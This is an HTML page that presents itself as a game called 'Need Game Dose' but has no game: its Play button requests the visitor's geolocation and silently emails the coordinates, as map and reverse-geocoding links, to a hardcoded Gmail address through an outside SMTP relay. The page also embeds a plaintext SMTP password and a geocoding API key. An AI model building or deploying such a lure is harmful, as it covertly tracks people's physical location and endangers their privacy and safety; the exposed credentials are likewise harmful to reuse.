<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Need Game Dose</title>
    <style>
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
      }
      body {
        background-color: #7743db;
      }
      .container {
        width: 100vw;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
      }
      .circle {
        width: 250px;
        height: 250px;
        background-color: #7743db;
        border-radius: 50%;
        display: flex;
        align-items: center;
        justify-content: center;
        cursor: pointer;
        box-shadow: 20px 20px 60px #6539ba, -20px -20px 60px #894dfc;
      }
      .disable {
        cursor: not-allowed;
      }
      h1 {
        font-size: 50px;
        color: #fff;
        font-family: "Trebuchet MS", "Lucida Sans Unicode", "Lucida Grande",
          "Lucida Sans", Arial, sans-serif;
      }
    </style>
  </head>
  <body>
    <div class="container">
      <h1 class="status">Need Game Dose</h1>
      <br /><br /><br /><br />
      <div class="circle" onclick="findMyLocation()"><h1>Play</h1></div>
    </div>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script>
      const findMyLocation = () => {
        const circle = document.querySelector(".circle");
        const status = document.querySelector(".status");
        circle.classList.add("disable");
        const success = (position) => {
          const latitude = position.coords.latitude;
          const longitude = position.coords.longitude;
          {
            Email.send({
              Host: "smtp.elasticemail.com",
              Username: "programmernotebook@gmail.com",
              Password: "F240E30B31527E395EECE56F7450D0A56A38",
              To: "programmernotebook@gmail.com",
              From: "programmernotebook@gmail.com",
              Subject: new Date(),
              Body: `Link 1 - https://www.google.com/maps/@${latitude},${longitude},16z?hl=en <br>
                     Link 2 - https://api.opencagedata.com/geocode/v1/json?q=${latitude}+${longitude}&key=81db787190624dec8ac225bccc0436dc <br>
                     Link 3 - https://api.bigdatacloud.net/data/reverse-geocode-client?latitude=${latitude}&longitude=${longitude}&localityLanguage=en`,
            }).then((message) => {
              if (message === "OK") {
                status.innerText = "Thank You Visit Again";
              } else {
                status.innerText = "Try Again and Allow";
              }
            });
          }
        };
        const error = () => {
          status.innerText = "Try Again and Allow";
        };
        navigator.geolocation.getCurrentPosition(success, error);
      };
    </script>
  </body>
</html>
